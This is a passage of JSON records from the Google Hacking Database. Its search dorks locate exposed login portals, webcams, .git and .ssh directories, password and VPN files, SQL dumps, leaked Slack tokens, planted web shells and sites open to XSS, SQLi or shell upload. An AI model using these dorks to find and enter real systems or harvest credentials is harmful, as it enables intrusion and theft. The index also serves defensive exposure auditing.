inurl:main.html\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4238", "link": "https://www.exploit-db.com/ghdb/4238/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"", "shortDescription": "inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"", "textualDescription": "Logon - SAP Web Application Server and Job Search: inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"\n\nSAP Web Application Server Password Reset: inurl:/sap/bc/webdynpro/sap/ | \"ysccwa_password_reset?sap-client\"\n\n\n-Xploit" }, { "signatureReferenceNumber": "4239", "link": "https://www.exploit-db.com/ghdb/4239/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=(intext:\"index of /.git\") (\"parent directory\")", "shortDescription": "(intext:\"index of /.git\") (\"parent directory\")", "textualDescription": "This dork will find git repository's which may have sensitive information.\n\n(intext:\"index of /.git\") (\"parent directory\")\n\nEnjoy!\nnecrodamus" }, { "signatureReferenceNumber": "4240", "link": "https://www.exploit-db.com/ghdb/4240/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"VOOD - Welcome to Vood Residential Gateway >Login\"", "shortDescription": "intitle:\"VOOD - Welcome to Vood Residential Gateway >Login\"", "textualDescription": "Multiple VOOD Online Gateways!\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br" }, { "signatureReferenceNumber": "4241", "link": "https://www.exploit-db.com/ghdb/4241/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Residential Gateway Configuration:\" intext:\"Cable Modem Information.\"", "shortDescription": "intitle:\"Residential Gateway Configuration:\" intext:\"Cable Modem Information.\"", "textualDescription": "Various online cable modem devices! More info:\nhttp://www.ubeeinteractive.com \n\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br" }, { "signatureReferenceNumber": "4242", "link": "https://www.exploit-db.com/ghdb/4242/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Login Page\" intext:\"Phone Adapter Configuration Utility\"", "shortDescription": "intitle:\"Login Page\" intext:\"Phone Adapter Configuration Utility\"", "textualDescription": "Various online Cisco VOIP devices (SPA 112)! More info:\nhttp://www.cisco.com/\n\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br" }, { "signatureReferenceNumber": "4243", "link": "https://www.exploit-db.com/ghdb/4243/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:vood act=index Gateway >Login", "shortDescription": "intitle:vood act=index Gateway >Login", "textualDescription": "More VOOD Online Gateway Logins\ninurl:/vood/cgi-bin/vood_view.cgi?act=index\n\n\n-Xploit" }, { "signatureReferenceNumber": "4244", "link": "https://www.exploit-db.com/ghdb/4244/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:\"powered by webcamXP 5\"", "shortDescription": "intext:\"powered by webcamXP 5\"", "textualDescription": "Various webcamXP version 5! More info: http://webcamxp.com\n\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br" }, { "signatureReferenceNumber": "4245", "link": "https://www.exploit-db.com/ghdb/4245/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\".asp?strParents=\"", "shortDescription": "inurl:\".asp?strParents=\"", "textualDescription": "Author: Charley Celice (@charleycelice)\n\n99% of sites I found using this dork are vulnerable to XSS attacks. The\n\"strParents\" parameter seems to always be injectable.\n\nExample:\n\nhttps://example/whatever.asp?strParents=\n\"/>&CAT_ID=1337&whatever=1337&etc...\n\n\n-stmerry" }, { "signatureReferenceNumber": "4246", "link": "https://www.exploit-db.com/ghdb/4246/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/smpwservices.fcc | \"/lm_private/CkeSetter.aspx\"", "shortDescription": "inurl:/smpwservices.fcc | \"/lm_private/CkeSetter.aspx\"", "textualDescription": "CA Technologies\u00a0CA Single Sign-On (CA SSO) Error's.\u00a0\n\n-Xploit" }, { "signatureReferenceNumber": "4247", "link": "https://www.exploit-db.com/ghdb/4247/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/siteminderagent/ | app:\"Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/\"", "shortDescription": "inurl:/siteminderagent/ | app:\"Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/\"", "textualDescription": "CA Technologies\u00a0CA Single Sign-On (CA SSO) Error's.\u00a0\n\n-Xploit" }, { "signatureReferenceNumber": "4248", "link": "https://www.exploit-db.com/ghdb/4248/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army", "shortDescription": "intitle:Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army", "textualDescription": "Google dork Description :\u00a0intitle:\"Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army\"\n\nAuthor: youssef hesham\nan exploit to find uploaded cPanel Finder/Cracker script and find cracked cpanle on it" }, { "signatureReferenceNumber": "4249", "link": "https://www.exploit-db.com/ghdb/4249/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=filetype:asp intitle:\" Microsoft Outlook Web Access\"", "shortDescription": "filetype:asp intitle:\" Microsoft Outlook Web Access\"", "textualDescription": "Dork who get access to \"Microsoft Outlook Web Access\" Panels.\nBest Regards.\nRootkit Pentester." }, { "signatureReferenceNumber": "4250", "link": "https://www.exploit-db.com/ghdb/4250/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"OneAccess WCF\" Username", "shortDescription": "intitle:\"OneAccess WCF\" Username", "textualDescription": "Login screen for the OneAccess routers.\n\nAuthor: Manuel Mancera (@sinkmanu)" }, { "signatureReferenceNumber": "4251", "link": "https://www.exploit-db.com/ghdb/4251/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:\"DSM Terminator [ ABORT ]\" | inurl:\"./com.sap.portal.dsm.Terminator\"", "shortDescription": "intitle:\"DSM Terminator [ ABORT ]\" | inurl:\"./com.sap.portal.dsm.Terminator\"", "textualDescription": "DSM Terminator Error\n\n-Xploit" }, { "signatureReferenceNumber": "4252", "link": "https://www.exploit-db.com/ghdb/4252/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:backoffice intitle:login", "shortDescription": "inurl:backoffice intitle:login", "textualDescription": "# Exploit Title: BackOffice Login Portals\n# Google Dork: inurl:backoffice intitle:login\n# Description: Dork to find login portal access to Backoffice CMS..\n# Date: 01/04/2016\n# Exploit Author: XDarkCoder" }, { "signatureReferenceNumber": "4253", "link": "https://www.exploit-db.com/ghdb/4253/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:9443/vsphere-client", "shortDescription": "inurl:9443/vsphere-client", "textualDescription": "Google dork Description: inurl:9443/vsphere-client\nGoogle search: inurl:9443/vsphere-client\nDate: 2016-02-04\nAuthor: khajj16\nSummary: The VMware vSphere Web Client is the Web-based application that\nconnects users to the vCenter Server to manage installations and handle\ninventory objects in a vSphere environment." }, { "signatureReferenceNumber": "4254", "link": "https://www.exploit-db.com/ghdb/4254/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:lg intitle:\"Looking Glass\"", "shortDescription": "inurl:lg intitle:\"Looking Glass\"", "textualDescription": "Panels with lot of information of bgp and ping, tracert services and more\nxD.\nBest Regards.\nRootkit Pentester." }, { "signatureReferenceNumber": "4255", "link": "https://www.exploit-db.com/ghdb/4255/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"", "shortDescription": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"", "textualDescription": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"\n\nProduces about 11,000 results.\n\nAuthor: pHr0ZZy" }, { "signatureReferenceNumber": "4256", "link": "https://www.exploit-db.com/ghdb/4256/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/view/viewer_index.shtml", "shortDescription": "inurl:/view/viewer_index.shtml", "textualDescription": "inurl:/view/viewer_index.shtml \n\nUsing this google dork can access various camera LIVE AXIS MODEL around the world ..\nTHis google dork is created by CYBER GENIUS ( SIVABALAN )." }, { "signatureReferenceNumber": "4257", "link": "https://www.exploit-db.com/ghdb/4257/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:index.php?app=main intitle:sms", "shortDescription": "inurl:index.php?app=main intitle:sms", "textualDescription": "login portals to playsms webapp\ndefault password admin:admin" }, { "signatureReferenceNumber": "4258", "link": "https://www.exploit-db.com/ghdb/4258/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/Remote/logon?ReturnUrl", "shortDescription": "inurl:/Remote/logon?ReturnUrl", "textualDescription": "inurl:/Remote/logon?ReturnUrl \n\nThis google dork can access many outdated and vulnerable windows servers out there..\n\nCreated by Sivabalan ( CYBER GENIUS)" }, { "signatureReferenceNumber": "4259", "link": "https://www.exploit-db.com/ghdb/4259/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/dynamic/login-simple.html?", "shortDescription": "inurl:/dynamic/login-simple.html?", "textualDescription": "inurl:/dynamic/login-simple.html?\n\nThis google dork can access many linksys Smart wifi accounts .\n\nCreated by Sivabalan ( CYBER GENIUS )" }, { "signatureReferenceNumber": "4260", "link": "https://www.exploit-db.com/ghdb/4260/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:https://pma.", "shortDescription": "inurl:https://pma.", "textualDescription": "Google dork Description: inurl:https://pma.\nGoogle search: inurl:https://pma.\nDate: 2016-11-04\nAuthor: khajj16\nSummary: phpmyadmin login portals intended to handle the administration of\nMySQL or MariaDB with the use of a web browser." }, { "signatureReferenceNumber": "4261", "link": "https://www.exploit-db.com/ghdb/4261/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:userRpm inurl:LoginRpm.htm", "shortDescription": "inurl:userRpm inurl:LoginRpm.htm", "textualDescription": "The below dork can list all the TPLink routers available.inurl:userRpm inurl:LoginRpm.htm\n\nRegards,\nSrini" }, { "signatureReferenceNumber": "4262", "link": "https://www.exploit-db.com/ghdb/4262/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491", "shortDescription": "site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491", "textualDescription": "# Exploit Title: [Files Containing E-mail and Associated Password Lists]\n# Google Dork: [site:pastebin.com intext:@gmail.com | @yahoo.com | \n@hotmail.com daterange:2457388-2457491 (adjust daterange as required)]\n# Date: [04/13/2016]\n# Exploit Author: [Stephanie Jensen]\n# Contact: [https://twitter.com/Steph_J_]\n# Website: [http://www.scriptkittysecurity.com]\n\n1.Description\n\nThis dork searches for all files within pastebin.com containing email \naddresses associated with yahoo, gmail or hotmail accounts. Due to the \nculture of pastebin.com most entries contain associated passwords for \nthese email addresses. Setting a relatively recent daterange query \nterm allows for recent files to be displayed.\n\nsite:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com \ndaterange:2457388-2457491 (date range can be changed for recent \nlisting of files - must use julian dates)" }, { "signatureReferenceNumber": "4263", "link": "https://www.exploit-db.com/ghdb/4263/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:inmotionhosting.com:2096/", "shortDescription": "inurl:inmotionhosting.com:2096/", "textualDescription": "# Title: Webmail login pages\n# Google Dork: inurl:inmotionhosting.com:2096/\n# Date: 04/14/2016\n# Author: Stephanie Jensen (https://twitter.com/Steph_J_)\n\n\nSummary\n\nSearching with omitted results gives you webmail login pages. Some \nsearch results even display login credentials in search result titles." }, { "signatureReferenceNumber": "4264", "link": "https://www.exploit-db.com/ghdb/4264/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:dynamic.php?page=mailbox", "shortDescription": "inurl:dynamic.php?page=mailbox", "textualDescription": "# Exploit Title: Webmail login pages\n# Google Dork: inurl:dynamic.php?page=mailbox\n# Date: 04/14/2016\n# Author: Stephanie Jensen\n\nSummary\n\nwebmail login pages - many with obvious usernames in search results. \nLogin attempts seem unlimited." }, { "signatureReferenceNumber": "4265", "link": "https://www.exploit-db.com/ghdb/4265/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:Index of /__MACOSX ...", "shortDescription": "intitle:Index of /__MACOSX ...", "textualDescription": "MAC OS X. Parent Directory \u00a0Wordpress information.\n\n-Xploit" }, { "signatureReferenceNumber": "4266", "link": "https://www.exploit-db.com/ghdb/4266/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:rcf inurl:vpn", "shortDescription": "filetype:rcf inurl:vpn", "textualDescription": "Sonicwall Global VPN Client files containing sensitive information and login" }, { "signatureReferenceNumber": "4267", "link": "https://www.exploit-db.com/ghdb/4267/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:pcf \"cisco\" \"GroupPwd\"", "shortDescription": "filetype:pcf \"cisco\" \"GroupPwd\"", "textualDescription": "Cisco VPN files with Group Passwords for remote access" }, { "signatureReferenceNumber": "4268", "link": "https://www.exploit-db.com/ghdb/4268/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"Skipfish . scan\"", "shortDescription": "intitle:\"Skipfish . scan\"", "textualDescription": "Google Dork: intitle:\"Skipfish . scan\"\nURL: http://www.google.com/search?q=intitle:%22Skipfish+.+scan%22\nDescription: Skipfish Vulnerability Scan Report\nAuthor: Andrea (aka theMiddle) Menin\n\n-theMiddle" }, { "signatureReferenceNumber": "4269", "link": "https://www.exploit-db.com/ghdb/4269/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pdf intitle:\"SSL Report\"", "shortDescription": "filetype:pdf intitle:\"SSL Report\"", "textualDescription": "These dork show Qualys SSL Reports Hosts.\nEnjoy with them.\nRegards.\nRootkit Pentester." }, { "signatureReferenceNumber": "4270", "link": "https://www.exploit-db.com/ghdb/4270/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=/@fmb80_encoder.htm", "shortDescription": "/@fmb80_encoder.htm", "textualDescription": "Hi !\nI'm a sound technicien in radio fm world\n\nThis dork give u acces to digiplexer (u can change text of all the listener of a FM radio in there car for exemple : ) )\n\npeace" }, { "signatureReferenceNumber": "4271", "link": "https://www.exploit-db.com/ghdb/4271/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"", "shortDescription": "site:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"", "textualDescription": "Slack auth tokens used by \"chatops\" bot developers mistakenly disclosed on github.com:\n\nsite:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"\n\n-- \nNicholas Hinsch" }, { "signatureReferenceNumber": "4272", "link": "https://www.exploit-db.com/ghdb/4272/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=filetype:pwd intitle:index", "shortDescription": "filetype:pwd intitle:index", "textualDescription": "Google dork:\nfiletype:pwd intitle:index\n\n\nD0bby" }, { "signatureReferenceNumber": "4273", "link": "https://www.exploit-db.com/ghdb/4273/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:configfile.cgi", "shortDescription": "inurl:configfile.cgi", "textualDescription": "Google dork:\ninurl:configfile.cgi\n\n\nD0bby" }, { "signatureReferenceNumber": "4274", "link": "https://www.exploit-db.com/ghdb/4274/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/owncloud/index.php\" -github -forum", "shortDescription": "inurl:\"/owncloud/index.php\" -github -forum", "textualDescription": "Google dork Description: inurl:\"/owncloud/index.php\" -github -forum\nGoogle search: inurl:\"/owncloud/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: Owncloud login portal." }, { "signatureReferenceNumber": "4275", "link": "https://www.exploit-db.com/ghdb/4275/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/eyeos/index.php\" -github -forum", "shortDescription": "inurl:\"/eyeos/index.php\" -github -forum", "textualDescription": "Google dork Description: inurl:\"/eyeos/index.php\" -github -forum\nGoogle search: inurl:\"/eyeos/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: WebOS login portal for EyeOS." }, { "signatureReferenceNumber": "4276", "link": "https://www.exploit-db.com/ghdb/4276/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/owncloud/public.php\" -github -forum", "shortDescription": "inurl:\"/owncloud/public.php\" -github -forum", "textualDescription": "Dork for shared files Owncloud.\nHave Fun.\nRegards.\nRootkit Pentester." }, { "signatureReferenceNumber": "4277", "link": "https://www.exploit-db.com/ghdb/4277/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=index of /wp-content/uploads/userpro", "shortDescription": "index of /wp-content/uploads/userpro", "textualDescription": "Alot of juicy info found, some csv files found that had alot of personal\ninformation.\n\nSometimes if you type ConversationUnread you can get the same results.\n\nstag_1" }, { "signatureReferenceNumber": "4278", "link": "https://www.exploit-db.com/ghdb/4278/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:\"Struts Problem Report\" intext:\"development mode is enabled.\"", "shortDescription": "intitle:\"Struts Problem Report\" intext:\"development mode is enabled.\"", "textualDescription": "intitle:\"Struts Problem Report\" intext:\"development mode is\nenabled.\"\n\nabout 51,600 apache struts apps in dev-mode.\n\npHr0ZZy" }, { "signatureReferenceNumber": "4279", "link": "https://www.exploit-db.com/ghdb/4279/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:\"eav\" filetype:txt", "shortDescription": "intext:\"eav\" filetype:txt", "textualDescription": "Files containing usernames & passwords of NOD32 antivirus accounts. \nGoogle dork:\nintext:\"eav\" filetype:txt\n\nThanks!\n\nD0bby" }, { "signatureReferenceNumber": "4280", "link": "https://www.exploit-db.com/ghdb/4280/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/sites/default/files/webform/", "shortDescription": "inurl:/sites/default/files/webform/", "textualDescription": "Description: Drupal default web-forms' storage path, usually a lot of files there contains juicy info\n\nGoogle search: inurl:/sites/default/files/webform/\n\nDork Author: Serhii Pronin" }, { "signatureReferenceNumber": "4281", "link": "https://www.exploit-db.com/ghdb/4281/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:demo.browse.php intitle:getid3", "shortDescription": "inurl:demo.browse.php intitle:getid3", "textualDescription": "The getID3 demo can allow directory traversal, deleting files, etc.\n\nhttps://github.com/JamesHeinrich/getID3/blob/master/demos/demo.browse.php\n\nSean Murphy / Senior Developer / Wordfence\n4948 DD81 CF99 3510 DFF0 44A6 A6D8 401E D683 98F5" }, { "signatureReferenceNumber": "4282", "link": "https://www.exploit-db.com/ghdb/4282/", "category": "Footholds", "querystring": "http://www.google.com/search?q=\"Fenix Final Version v2.0\" filetype:php", "shortDescription": "\"Fenix Final Version v2.0\" filetype:php", "textualDescription": "Web-Shell new, very interesting.\nHave Fun.\n\nRegards.\nRootkit Pentester." }, { "signatureReferenceNumber": "4283", "link": "https://www.exploit-db.com/ghdb/4283/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"MODX CMF Manager Login\"", "shortDescription": "intitle:\"MODX CMF Manager Login\"", "textualDescription": "Searches for MODX login portals, even if admin portal URL is not at usual\nlocation of /manager/\n\nAuthor: Charles Holtzkampf" }, { "signatureReferenceNumber": "4284", "link": "https://www.exploit-db.com/ghdb/4284/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:vidyo -site:vidyo.com inurl:portal", "shortDescription": "inurl:vidyo -site:vidyo.com inurl:portal", "textualDescription": "Vidyo Portals. File Disclosure\n\ninurl:vidyo -site:vidyo.com inurl:portal" }, { "signatureReferenceNumber": "4285", "link": "https://www.exploit-db.com/ghdb/4285/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:citrix inurl:login.asp -site:citrix.com", "shortDescription": "inurl:citrix inurl:login.asp -site:citrix.com", "textualDescription": "Citrix Login Portals\n\ninurl:citrix inurl:login.asp -site:citrix.com" }, { "signatureReferenceNumber": "4286", "link": "https://www.exploit-db.com/ghdb/4286/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us", "shortDescription": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us", "textualDescription": "filetype:txt \"gmail\" | \"hotmail\" | \"yahoo\" -robots site:gov | site:us\n\nEmails" }, { "signatureReferenceNumber": "4287", "link": "https://www.exploit-db.com/ghdb/4287/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com", "shortDescription": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com", "textualDescription": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com\n\nAfterLogic WebMail\n\nXXE Injection Vulnerability\n\nhttps://www.exploit-db.com/exploits/39850/\n\n\nDecoy" }, { "signatureReferenceNumber": "4288", "link": "https://www.exploit-db.com/ghdb/4288/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=ext:php inurl:\"api.php?action=\"", "shortDescription": "ext:php inurl:\"api.php?action=\"", "textualDescription": "ext:php inurl:\"api.php?action=\"\n\nXenAPI/XenForo SQLi Vulnerability\n\nhttps://www.exploit-db.com/exploits/39849/" }, { "signatureReferenceNumber": "4289", "link": "https://www.exploit-db.com/ghdb/4289/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:\"Forum software by XenForo\u2122\"", "shortDescription": "intext:\"Forum software by XenForo\u2122\"", "textualDescription": "intext:\"Forum software by XenForo\u2122\"\n\nXenForo SQLi Vulnerability. - https://www.exploit-db.com/exploits/39849/\n\n\"value\" parameter unsanitized." }, { "signatureReferenceNumber": "4290", "link": "https://www.exploit-db.com/ghdb/4290/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:\"Powered by BOMGAR\"", "shortDescription": "intext:\"Powered by BOMGAR\"", "textualDescription": "intext:\"Powered by BOMGAR\"" }, { "signatureReferenceNumber": "4291", "link": "https://www.exploit-db.com/ghdb/4291/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/WebInterface/login.html", "shortDescription": "inurl:/WebInterface/login.html", "textualDescription": "Login Pages for CrushFTP\nMay bring up other programs FTP pages." }, { "signatureReferenceNumber": "4292", "link": "https://www.exploit-db.com/ghdb/4292/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"Hamdida X_Shell Backd00r\"", "shortDescription": "intitle:\"Hamdida X_Shell Backd00r\"", "textualDescription": "Interesting little backdoor.\n\nintitle:\"Hamdida X_Shell Backd00r\"\n\nDecoy" }, { "signatureReferenceNumber": "4293", "link": "https://www.exploit-db.com/ghdb/4293/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken clock drift detected\"", "shortDescription": "inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken clock drift detected\"", "textualDescription": "Description : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nSearch : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nDate: 05-06-2016\nAuthor: Krishna\nSummary:Exposed SSL VPN Login pages for Fortiguard SSL VPN." }, { "signatureReferenceNumber": "4294", "link": "https://www.exploit-db.com/ghdb/4294/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:.ssh intitle:index.of authorized_keys", "shortDescription": "inurl:.ssh intitle:index.of authorized_keys", "textualDescription": "SSH Keys\n\ninurl:.ssh intitle:index.of authorized_keys\n\nDecoy" }, { "signatureReferenceNumber": "4295", "link": "https://www.exploit-db.com/ghdb/4295/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:trash intitle:index.of", "shortDescription": "inurl:trash intitle:index.of", "textualDescription": "One man's trash is another man's treasure.\n\ninurl:trash intitle:index.of\n\nDecoy" }, { "signatureReferenceNumber": "4296", "link": "https://www.exploit-db.com/ghdb/4296/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php", "shortDescription": "inurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php", "textualDescription": "WP Mobile Detector 3.5 Remote Shell Upload\n\nhttps://www.exploit-db.com/exploits/39891/\n\ninurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php\n\nDecoy" }, { "signatureReferenceNumber": "4297", "link": "https://www.exploit-db.com/ghdb/4297/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Zixmail inurl:/s/login?", "shortDescription": "Zixmail inurl:/s/login?", "textualDescription": "Zixmail Secure Email Logon Portals.\n-Xploit" }, { "signatureReferenceNumber": "4298", "link": "https://www.exploit-db.com/ghdb/4298/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/wp-content/uploads/levoslideshow/\"", "shortDescription": "inurl:\"/wp-content/uploads/levoslideshow/\"", "textualDescription": "Webshell Upload.\n\nWordpress Levo-Slideshow 2.3\n\ninurl:\"/wp-content/uploads/levoslideshow/\"\n\nDecoy" }, { "signatureReferenceNumber": "4299", "link": "https://www.exploit-db.com/ghdb/4299/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site:github.com ext:csv userid | username | user -example password", "shortDescription": "site:github.com ext:csv userid | username | user -example password", "textualDescription": "Whoops.\n\nsite:github.com ext:csv userid | username | user -example password\n\nDecoy" }, { "signatureReferenceNumber": "4300", "link": "https://www.exploit-db.com/ghdb/4300/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/awcuser/cgi-bin/", "shortDescription": "inurl:/awcuser/cgi-bin/", "textualDescription": "Google Dork for Mitel systems:\n\ninurl:/awcuser/cgi-bin/\n\n@_aliardic_" }, { "signatureReferenceNumber": "4301", "link": "https://www.exploit-db.com/ghdb/4301/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intext:\"expects parameter 1 to be resource, boolean given\" filetype:php", "shortDescription": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php", "textualDescription": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php\n\nReturns around 997,000 vulnerable mysql-based websites." }, { "signatureReferenceNumber": "4302", "link": "https://www.exploit-db.com/ghdb/4302/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:\"Hello visitor from\" ext:asp", "shortDescription": "intext:\"Hello visitor from\" ext:asp", "textualDescription": "intext:\"Hello visitor from\" ext:asp\natawho - sonadam - antidote\ndetails\nhttps://monodram.net/2015/10/10/user-agent-xss-inj.html" }, { "signatureReferenceNumber": "4303", "link": "https://www.exploit-db.com/ghdb/4303/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:top.htm inurl:currenttime", "shortDescription": "inurl:top.htm inurl:currenttime", "textualDescription": "Dork with a lot of cameras online.\nEnjoy Healthy.\nRegards.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4304", "link": "https://www.exploit-db.com/ghdb/4304/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"/LM/W3SVC/\" ext:asp", "shortDescription": "intext:\"/LM/W3SVC/\" ext:asp", "textualDescription": "intext:\"/LM/W3SVC/\" ext:asp\nServerVariables that give information.\n\n-Xploit" }, { "signatureReferenceNumber": "4305", "link": "https://www.exploit-db.com/ghdb/4305/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"/showme.asp\" HTTP_ACCEPT", "shortDescription": "intext:\"/showme.asp\" HTTP_ACCEPT", "textualDescription": "intext:\"/showme.asp\" HTTP_ACCEPT\nApplication & Session Contents for Servers.\n\n-Xploit" }, { "signatureReferenceNumber": "4306", "link": "https://www.exploit-db.com/ghdb/4306/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"Index of /wp-content/uploads/backupbuddy_backups\" zip", "shortDescription": "\"Index of /wp-content/uploads/backupbuddy_backups\" zip", "textualDescription": "Search for iThemes BackupBuddy backup zips\n\n\u2013 balcsida" }, { "signatureReferenceNumber": "4307", "link": "https://www.exploit-db.com/ghdb/4307/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"index of\" bigdump.php", "shortDescription": "\"index of\" bigdump.php", "textualDescription": "Search for BigDump: Staggered MySQL Dump Importer file\n- Arbitrary Upload\n- Juicy info/passwords\n- Deleting files\n- MySQL injection" }, { "signatureReferenceNumber": "4308", "link": "https://www.exploit-db.com/ghdb/4308/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:sql intext:wp_users phpmyadmin", "shortDescription": "filetype:sql intext:wp_users phpmyadmin", "textualDescription": "# Exploit Title: (Google Dork) filetype:sql intext:wp_users phpmyadmin\n# Google Dork: filetype:sql intext:wp_users phpmyadmin\n# Date: 2016-07-06\n# Exploit Author: RuBiQc\n\nDescription: Finds SQL dump files of Wordpress sites with usernames and \npasswords. Pretty funny that people make these publicly available!" }, { "signatureReferenceNumber": "4309", "link": "https://www.exploit-db.com/ghdb/4309/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?q=intext:\"Dumping data for table `orders`\"", "shortDescription": "intext:\"Dumping data for table `orders`\"", "textualDescription": 